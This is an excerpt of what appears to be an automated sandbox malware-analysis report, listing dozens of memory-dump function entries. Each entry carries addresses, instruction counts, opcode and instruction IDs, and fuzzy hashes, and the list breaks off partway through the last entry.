                              Function 00007FFD9BADDE98 Relevance: .1, Instructions: 125COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3fb9c21a1157359b6655bd78e893f4f28dcc682eaf0e935fb4ea9ae519f5445f
                              • Instruction ID: 7e92f7ff1877c89e577d72dd7d696856185ca57ca61f1b21d24bc6b05083f125
                              • Opcode Fuzzy Hash: 3fb9c21a1157359b6655bd78e893f4f28dcc682eaf0e935fb4ea9ae519f5445f
                              • Instruction Fuzzy Hash: A8410B6248E7C24FD35383B098355927FB0AE97224B0A46EFD4C1CF4A3E1495A4AC363
                              Function 00007FFD9BAD803D Relevance: .1, Instructions: 123COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: fd52d136671fa5acc97f6f4c45717357a28650107c75671f75f141d5361578a2
                              • Instruction ID: 54bede20ad6212852a2d031212cd2d3e75216841395f6e1c216fdbc236c50498
                              • Opcode Fuzzy Hash: fd52d136671fa5acc97f6f4c45717357a28650107c75671f75f141d5361578a2
                              • Instruction Fuzzy Hash: 60312531A0A99D4FEB61EBB888256E97BF0EF85320B4601FAE448D31B2CA5859028351
                              Function 00007FFD9BAEADF0 Relevance: .1, Instructions: 123COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 50966a0a44660d568a8b6f1fc0639dbffd444fe60beaf62cbb4bdf5fa05d0ea7
                              • Instruction ID: 4c81237da038bf0c4f926224a5e47e7e1161cf34712df2a31b7ab193e174d2b1
                              • Opcode Fuzzy Hash: 50966a0a44660d568a8b6f1fc0639dbffd444fe60beaf62cbb4bdf5fa05d0ea7
                              • Instruction Fuzzy Hash: 11317A3170E94F0FEB74AB6C887553237D1EF65305B2541BAD48EC31A7EE69E8028380
                              Function 00007FFD9BADE853 Relevance: .1, Instructions: 118COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3ad6e7b27763b0ce58101b3aa8adf500be2f554aff012fa62cc81856dbff65d5
                              • Instruction ID: 1c6ec82c30485ff92e4f3ea24e975324b26aaa887f2700fafad5c20b0d78def0
                              • Opcode Fuzzy Hash: 3ad6e7b27763b0ce58101b3aa8adf500be2f554aff012fa62cc81856dbff65d5
                              • Instruction Fuzzy Hash: A0314031B0990E8FDF98EF48D4A1BAD73A1FF98314F110269E41DC3295CA74E952C780
                              Function 00007FFD9BAEAF00 Relevance: .1, Instructions: 114COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 76005c0b6b41117a48e522270e212b2d62db33ad53551232b8e58a62ec51edd6
                              • Instruction ID: 642066e4e51a4a1474db08c1cbe7dda14ac594c125d899d58902b2ea85dda3cd
                              • Opcode Fuzzy Hash: 76005c0b6b41117a48e522270e212b2d62db33ad53551232b8e58a62ec51edd6
                              • Instruction Fuzzy Hash: 8A310732A1CA450FE75CA65C98668FA77D0EF98328F00427FF49E871D7DD24A8468385
                              Function 00007FFD9BAD0640 Relevance: .1, Instructions: 110COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 908b6533e511f3c4bb7308a0ce7a9547b3963b6c00622d8b10846c3c2040fcb9
                              • Instruction ID: 4f7d2eac457da3756417388f27300b17c13069834b130e549465f8c3eb21e6a6
                              • Opcode Fuzzy Hash: 908b6533e511f3c4bb7308a0ce7a9547b3963b6c00622d8b10846c3c2040fcb9
                              • Instruction Fuzzy Hash: 5231E522F0994A4FEB58AB6C4865AE977D1EFA8328F0442BBE01DC71D7ED18A9018741
                              Function 00007FFD9BAD7569 Relevance: .1, Instructions: 109COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 621b84df499600becc5a56ddbb3e420c039c4a29a128dc1b4616f83b9380ba0c
                              • Instruction ID: 9f9d1ba7f0baeca3fd5b5d19fe386b6865986c39c1d3c0fb5a03ee417e37532c
                              • Opcode Fuzzy Hash: 621b84df499600becc5a56ddbb3e420c039c4a29a128dc1b4616f83b9380ba0c
                              • Instruction Fuzzy Hash: 36312722F0D98A4FEB98EB6C4865AA877E1EFA4314F0502BBE05DC71E7EC189C058741
                              Function 00007FFD9BAE47D2 Relevance: .1, Instructions: 106COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 25725ecd505e7906710c1ebec8bb6078954952f6e6888f5c216cd830f4b0c08f
                              • Instruction ID: f4c78afbacd6158b8357f917ae9a1782bbe2534256784a5f2246e83d7ac04cf7
                              • Opcode Fuzzy Hash: 25725ecd505e7906710c1ebec8bb6078954952f6e6888f5c216cd830f4b0c08f
                              • Instruction Fuzzy Hash: 01312631A0894E8FDB98DF58C494BA977E1FFA8304F144669E45DC72A9CF74E942CB80
                              Function 00007FFD9BAD7EF2 Relevance: .1, Instructions: 106COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 314b855e8978dde29c0fec57f20cf9e678a0f85e4dc4943fe9066e2d7a0d2aee
                              • Instruction ID: 3fce85d4215ce2d78311e21ddaf1a049da873394ffbe69ca041c49d1a34dfc2b
                              • Opcode Fuzzy Hash: 314b855e8978dde29c0fec57f20cf9e678a0f85e4dc4943fe9066e2d7a0d2aee
                              • Instruction Fuzzy Hash: 0431D231F1A55E4FEBA4EBA888256FDB3E0EF88310F4502B6D40DE31A2DE685D058351
                              Function 00007FFD9BAE8179 Relevance: .1, Instructions: 105COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 097bab737f706f266b326e67434c743b64b93400708ab897f28c79bbd74531b2
                              • Instruction ID: cad96ce9d528997d414d2403a8b78fee69d35d73cd3ab47437baa560edcaa920
                              • Opcode Fuzzy Hash: 097bab737f706f266b326e67434c743b64b93400708ab897f28c79bbd74531b2
                              • Instruction Fuzzy Hash: 7B317870B1E65A4FD32A8F6484A40797BE2FF86720B1145BFE0CBC31A6EE7968418340
                              Function 00007FFD9BB0A170 Relevance: .1, Instructions: 105COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d327eb5eae6c64c1bbfffa0cd0e0fb4c59b4263b44777e0e96f13afe47df43f1
                              • Instruction ID: a6280008e187a69abdd20f4d78ba934d2bd08157d82d4c4f9fe2fb48d1586908
                              • Opcode Fuzzy Hash: d327eb5eae6c64c1bbfffa0cd0e0fb4c59b4263b44777e0e96f13afe47df43f1
                              • Instruction Fuzzy Hash: 8E31F43171DB4C4FCB54EB5CC094AAAB7E1FB99354F004A7AE049C32A4CE30E981C782
                              Function 00007FFD9BAD7580 Relevance: .1, Instructions: 103COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: af0f76c3e315802815ee5995eb6e755101fec0261695d5d3b815f735a6f2a205
                              • Instruction ID: 61d9cfd18347f83369def622efbd6ff13a9102090337d170a65240af211b71b0
                              • Opcode Fuzzy Hash: af0f76c3e315802815ee5995eb6e755101fec0261695d5d3b815f735a6f2a205
                              • Instruction Fuzzy Hash: 2B210A22F0994A4FEB9CEB6C8865AB977D1EFA8364F0443BAF01DC71D6ED14AD018741
                              Function 00007FFD9BAE06AA Relevance: .1, Instructions: 102COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 40532cfee74b1a9077b90602b31ee3f7ec69ed1b2af4bc4233392b5c5cef4917
                              • Instruction ID: a622609aa3567d20550399ca4511972cea05db01bf50ca6de2da6b6ffc291125
                              • Opcode Fuzzy Hash: 40532cfee74b1a9077b90602b31ee3f7ec69ed1b2af4bc4233392b5c5cef4917
                              • Instruction Fuzzy Hash: 4E214836F0AC5E0AF7B4A7E448222F977D0EF85711F060176D41CE30E2EDA92A1A4A85
                              Function 00007FFD9BAE9D48 Relevance: .1, Instructions: 98COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2dca51213576f8abd9e280d384ca55d1468c93452a0f60c2aed53ce805122a84
                              • Instruction ID: b2bb69f2af95366cca4454822db80b55f8aea80432ea71235b484a2d24ae0972
                              • Opcode Fuzzy Hash: 2dca51213576f8abd9e280d384ca55d1468c93452a0f60c2aed53ce805122a84
                              • Instruction Fuzzy Hash: BC21D231B0990D4FD798EA1CD894AB673D1FF98329F40477AE48DC71DADE29E9418780
                              Function 00007FFD9BAEB148 Relevance: .1, Instructions: 97COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 054d52c834098a8012be1874f914d4a41d94aede86f6488e4508b3f8c6f6de13
                              • Instruction ID: 5c7f02ef5f13cb1f6e5f8a4a46655e4afd62c63622e8722425ec60b6a8dff996
                              • Opcode Fuzzy Hash: 054d52c834098a8012be1874f914d4a41d94aede86f6488e4508b3f8c6f6de13
                              • Instruction Fuzzy Hash: 5021F63170DB0C1FE668A66C945A97AB7C1FB99765B01063FE44EC32B2ED25B9424382
                              Function 00007FFD9BAE9147 Relevance: .1, Instructions: 96COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3600aafde2ed081aea20ac6213f631666633bee32515c697918412f3b701f1ab
                              • Instruction ID: f0cc9f856aa44416def6fb8a4d73e2810c22db60a32fee1d12f4ad5717ac6949
                              • Opcode Fuzzy Hash: 3600aafde2ed081aea20ac6213f631666633bee32515c697918412f3b701f1ab
                              • Instruction Fuzzy Hash: C2218E31718D084FD7A8EA1CD859A6573E1FBA8314B04026EE44EC36A6DE25EC45C780
                              Function 00007FFD9BAD8191 Relevance: .1, Instructions: 93COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6c0941e8f53213e764173301493bb464d63a6ae69142356d2c70ef456ba10cab
                              • Instruction ID: 7201f894d0e126a220e7bc5bcc0ca22fa15695f2d5ad44e124806cc7cfcec5b8
                              • Opcode Fuzzy Hash: 6c0941e8f53213e764173301493bb464d63a6ae69142356d2c70ef456ba10cab
                              • Instruction Fuzzy Hash: 92212621B5E9890FF791A77848256E53BE1EF86320B0A02F7E05DC71E3DD0D5D0A8311
                              Function 00007FFD9BAD164A Relevance: .1, Instructions: 92COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 235e085b840bd09f96d069b76f7e77bbf6e8eeb3d5349902e3622c512656af6b
                              • Instruction ID: 29b480c21fc552859b1f11bc01cf8ae4e287faa5e6afc461326d42a7f2ff5d91
                              • Opcode Fuzzy Hash: 235e085b840bd09f96d069b76f7e77bbf6e8eeb3d5349902e3622c512656af6b
                              • Instruction Fuzzy Hash: D0216431B1CA4D0FE764EBBC442A67877C2EF89220B0502FEE00DC32A3DC289C028381
                              Function 00007FFD9BAD6D42 Relevance: .1, Instructions: 92COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 79ab0f6ce130ddcac9e0173775ac2aadb938de8b5d89ac40ff0b9ffe5b6e2c98
                              • Instruction ID: 86e672774f540f7d641af50c0602027c1efdbcb25fafcc5a0dcff5285b02a58a
                              • Opcode Fuzzy Hash: 79ab0f6ce130ddcac9e0173775ac2aadb938de8b5d89ac40ff0b9ffe5b6e2c98
                              • Instruction Fuzzy Hash: 8A318130A0A58E4FE754EBACC465AB9BBE1EF99300F4505B9D05DC72E3CE685941C740
                              Function 00007FFD9BAE3260 Relevance: .1, Instructions: 90COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1fbb6e3c7575d7c3f859ed2d910a15f1bd8b334c015ef4c5349849866e76e986
                              • Instruction ID: e85cac284b4757631a002b9cc8af197fda958c03fda8a4bd193891fe9ac3c84a
                              • Opcode Fuzzy Hash: 1fbb6e3c7575d7c3f859ed2d910a15f1bd8b334c015ef4c5349849866e76e986
                              • Instruction Fuzzy Hash: 14210836F0A85E0AF770ABA458215FD72D8EF85360F02013EE41DD34F1DEA96B1A45C1
                              Function 00007FFD9BAE9187 Relevance: .1, Instructions: 88COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a038a471286af1f15f055881ed70e323eca675fff37deb13bc30ad228388ef99
                              • Instruction ID: fa8ccc2686ca8af9bf5f298c04f2c7a35ea41cac0eddf72fb5cdadfbeae5fe8b
                              • Opcode Fuzzy Hash: a038a471286af1f15f055881ed70e323eca675fff37deb13bc30ad228388ef99
                              • Instruction Fuzzy Hash: F4219031718E494FD7A8EF28C495A36B7E1FBAC354B10017EE48FC36A6DE30A8418741
                              Function 00007FFD9BAD6D1F Relevance: .1, Instructions: 88COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e432cee7bf0db4a89d0e13cc964655c3e52b39826d7e6eb66089687515f955fb
                              • Instruction ID: 604809506ceb3df1e3bdc67601c5dc5c51b837417740797e733fb8f2f76ec336
                              • Opcode Fuzzy Hash: e432cee7bf0db4a89d0e13cc964655c3e52b39826d7e6eb66089687515f955fb
                              • Instruction Fuzzy Hash: 99318F30A0A58E8FE794EBA8C465BB9BBE1EF99300F4505B8D049C72F3CE685941C740
                              Function 00007FFD9BAE16B0 Relevance: .1, Instructions: 86COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 21d4ba57bf3d41312de856fa7e23d55d883ceb47b955aac77fc3ba621ca95763
                              • Instruction ID: 6e232429acc439c722ba78a354d13ecf772f7b1bbb1c96345818d15760e5388b
                              • Opcode Fuzzy Hash: 21d4ba57bf3d41312de856fa7e23d55d883ceb47b955aac77fc3ba621ca95763
                              • Instruction Fuzzy Hash: EB11EC52F19E4E1FE7A8A5BC14696B662C2FFAC274B14427BD04DC31EFEC18AC414350
                              Function 00007FFD9BAD07B8 Relevance: .1, Instructions: 85COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9267a0ae6305baf99079624696d2440fdef6aefeaa29e708947d13178011c9e1
                              • Instruction ID: 650c68d4703ed8db983b77197b7ed67a1cb45d194c9e395e93e1b41baa4d90f2
                              • Opcode Fuzzy Hash: 9267a0ae6305baf99079624696d2440fdef6aefeaa29e708947d13178011c9e1
                              • Instruction Fuzzy Hash: 2B112621B19E0D0FE674EBAC546A67977C2EBDC760F0506BEE00DC32A2DC68AC4183C1
                              Function 00007FFD9BAEA780 Relevance: .1, Instructions: 83COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 96ce9c86a0717fbb3c7ab2dac2f20a31a24a73a3569c537fc4d2c1918f871abd
                              • Instruction ID: c350a978242152b3131e725c46c9a4e1693879f340653400caaf375be3a26c63
                              • Opcode Fuzzy Hash: 96ce9c86a0717fbb3c7ab2dac2f20a31a24a73a3569c537fc4d2c1918f871abd
                              • Instruction Fuzzy Hash: BA217830A0EA9E5FEBA5AA7448325E477A0FF61324F0505FAD118C70E7DD2C69058342
                              Function 00007FFD9BAEA2F5 Relevance: .1, Instructions: 82COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 503cb9c52f3841cefd926de2dc8b4c8caeb5418080432c28d97b013f248f05cd
                              • Instruction ID: 042b34a2804a890a4d4ec607725e870b1ca932f5afe51c7a257716d8f0267fc3
                              • Opcode Fuzzy Hash: 503cb9c52f3841cefd926de2dc8b4c8caeb5418080432c28d97b013f248f05cd
                              • Instruction Fuzzy Hash: 31215E3071990D4FDBA8EB68C4A8F7673E1FF58314B4141BAE45EC72A6DE24AC818780
                              Function 00007FFD9BAE53C2 Relevance: .1, Instructions: 80COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: bc9ad78c1bc8bd337f72b6f6e3ce6e64d773910ef97130da4189cb12a6c50c8f
                              • Instruction ID: 9180aa931e791ad5063b892ee28a85b64f73d8f652f68da79bf5907c98a27b4e
                              • Opcode Fuzzy Hash: bc9ad78c1bc8bd337f72b6f6e3ce6e64d773910ef97130da4189cb12a6c50c8f
                              • Instruction Fuzzy Hash: F7210B32E0E58E0EF7B193A46C336B976D2EF45322F0A01B6D45CC70E3DDA86A194691
                              Function 00007FFD9BADFAD5 Relevance: .1, Instructions: 80COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: fcd69a4b9b3be317637a255f904e5e338f4e33c5a8a7155063bb6b41b2df00ed
                              • Instruction ID: ced4ba3cd414107fbbde1f4b11edbccf8bc1d1fa4344276646323e26f802823e
                              • Opcode Fuzzy Hash: fcd69a4b9b3be317637a255f904e5e338f4e33c5a8a7155063bb6b41b2df00ed
                              • Instruction Fuzzy Hash: 2221C922F0A99E4EF77097A848312FA76D1EFE9324F460376D45CC30E3DD5A6B194581
                              Function 00007FFD9BAF0990 Relevance: .1, Instructions: 80COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3dbfe2f5222117a8c47cf3f351ebab117940e8189f99ae571a11f0490049ad8f
                              • Instruction ID: d944527bb17e782566aa254578c41446e17e0befc9b2fd743c776267586ddc28
                              • Opcode Fuzzy Hash: 3dbfe2f5222117a8c47cf3f351ebab117940e8189f99ae571a11f0490049ad8f
                              • Instruction Fuzzy Hash: 3011E622B2CD4D0BE37CA61C58655BA66D1EB68368711067FE05EC31EBEC25BD014280
                              Function 00007FFD9BAD3F65 Relevance: .1, Instructions: 80COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a381d8d6cf74c9be44f4dd17d2fc9c9463e1221a0e3e17f9e2afd25bc9bdd015
                              • Instruction ID: b21a65257f0f8e4300c98d13d007ca902d5aa1113c2cec9374389b51d5cbf2ff
                              • Opcode Fuzzy Hash: a381d8d6cf74c9be44f4dd17d2fc9c9463e1221a0e3e17f9e2afd25bc9bdd015
                              • Instruction Fuzzy Hash: A9110536F0A95E1AF7B0A7A408312F976D0EFC8310F460B79D45CC30F2DD9C2A1A4681
                              Function 00007FFD9BAE148A Relevance: .1, Instructions: 80COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ba024938f487d0afac53b1d2f5a06f180126015d1f1d4d0c291f9980b014adcc
                              • Instruction ID: 0792f116776da9f8176cca719cc2ed04d334f6365f50b1e0f07a53c668f2c1b6
                              • Opcode Fuzzy Hash: ba024938f487d0afac53b1d2f5a06f180126015d1f1d4d0c291f9980b014adcc
                              • Instruction Fuzzy Hash: E5215B32F0E96E4AF774A7A858312FD76D0EF69320F460176D41EC31E2EC9D2E0A4691
                              Function 00007FFD9BAD841A Relevance: .1, Instructions: 79COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: cb4584a2c1ab99154940bce06fca6f066b1183eacf3a5cab9ad152f62cbaa73f
                              • Instruction ID: 5874d9fe24267ad9f559b0154048bee74a6c5f70b98d007d812ed98dfec80bc3
                              • Opcode Fuzzy Hash: cb4584a2c1ab99154940bce06fca6f066b1183eacf3a5cab9ad152f62cbaa73f
                              • Instruction Fuzzy Hash: 6621D376F0F59E09F7B093A448312B976E5EFC5330F0A03BAD45CC24E3DD986A1A4281
                              Function 00007FFD9BAED642 Relevance: .1, Instructions: 79COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f6882618009216f23d1a2b168375361ff21af979e1b8c6679c9f2ee5f12415a5
